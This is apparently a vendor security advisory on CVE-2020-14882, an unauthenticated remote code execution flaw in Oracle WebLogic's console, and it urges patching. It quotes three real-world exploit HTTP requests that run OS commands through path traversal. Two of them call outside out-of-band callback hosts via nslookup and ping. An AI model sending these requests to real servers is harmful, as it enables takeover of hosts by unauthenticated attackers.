Critical Remote Code Execution (RCE) vulnerability CVE-2020-14882 in the console component of the WebLogic Server allows unauthenticated, remote attackers to execute commands on the affected servers. Oracle has assigned its CVSSv3 score of 9.8 out of 10 which clearly shows this vulnerability’s criticality and should be patched ASAP. Johannes B. Ullrich, dean of research at the SANS Technology Institute, said in the post that vulnerable Oracle WebLogic Servers that are not patched till now then “Assume it has been compromised“.
Exploits are seemed to be originated from a blog post published (in Vietnamese) by “Jang”. In his blog, he described how the flaw can be exploited to achieve remote code execution with only a single HTTP request.
The RCE vulnerability exists in the console component of the WebLogic Server. The vulnerability can be exploited by sending a crafted HTTP request and can lead to complete control of the host. A security researcher, Jang in his blog post included partial details of the flaw which can be used for a PoC.
As discussed in SANS ISC Post, the below exploits are currently used (the honeypot’s IP has been replaced with AAA.BBB.CCC.DDD)
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle= com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec(%27cmd /c
GET /console/images/%252e%252e%252fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession( \”java.lang.Runtime.getRuntime().exec( ‘nslookup%20AAA.BBB.CCC.DDD.0efp3gmy20ijk3tx20mqollbd2jtfh4.burpcollaborator.net’)
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec( %27ping%20AAA.BBB.CCC.DDD.uajiak.dnslog.cn%27);%22);
This pre-authentication is given an attack complexity of “low” and highlighted as “easily exploitable” by Oracle. Due to the “low” complexity of the exploit, attackers requires no user interaction and no privileges to exploit the vulnerability.
A typical crafted HTTP request which exploits the vulnerability and execute “calc.exe” is given below:
In the above request, “calc.exe” can be replaced by any other OS command.
Successful exploitation of the vulnerability “calc.exe” executed on the affected host as shown in the below picture.
Publicly available PoC
The proof-of-concept codes are publicly available for the vulnerability.
This vulnerability allows an unauthenticated, remote attacker to execute commands and can be used to achieve complete control of the affected host.
Affected Oracle WebLogic Versions
SanerNow security content has been published to detect this vulnerability. Oracle has already released a security update this month and these patches are available only for Oracle customers. Please be advised to download the patch from the Oracle portal and install it. SanerNow software deployment capability can be used to install executable/scripts.